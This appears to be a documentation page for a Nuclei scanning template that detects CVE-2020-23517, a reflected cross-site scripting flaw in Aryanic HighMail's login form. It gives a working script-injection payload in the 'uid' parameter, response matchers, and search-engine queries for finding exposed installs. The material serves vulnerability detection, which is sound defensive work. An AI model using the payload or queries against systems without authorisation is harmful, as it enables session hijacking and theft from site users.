Aryanic HighMail (High CMS) - Cross-Site Scripting
ID: CVE-2020-23517
Severity: medium
Author: geeknik
Tags: cve,cve2020,xss,cms,highmail,aryanic
Description
Section titled “Description”A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via ‘user’ to LoginForm.
YAML Source
Section titled “YAML Source”id: CVE-2020-23517
info: name: Aryanic HighMail (High CMS) - Cross-Site Scripting author: geeknik severity: medium description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html - https://nvd.nist.gov/vuln/detail/CVE-2020-23517 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Elsfa7-110/kenzer-templates - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-23517 cwe-id: CWE-79 epss-score: 0.00135 epss-percentile: 0.48718 cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: aryanic product: high_cms shodan-query: - title:"HighMail" - http.title:"highmail" fofa-query: - title="HighMail" - title="highmail" google-query: intitle:"highmail" tags: cve,cve2020,xss,cms,highmail,aryanic
http: - method: GET path: - "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" - "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
stop-at-first-match: true
matchers-condition: and matchers: - type: word words: - 'value=""><script>alert(document.domain)</script>'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a004730450220671cb0a0bbe2bdc795a5d9521f059f69277588ce1fa9460af6fd43ec131b7525022100af377376b9eaacae2f75920d1eb8a1a27e5006301db3fb803bc465a6f6771fa5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-23517.yaml"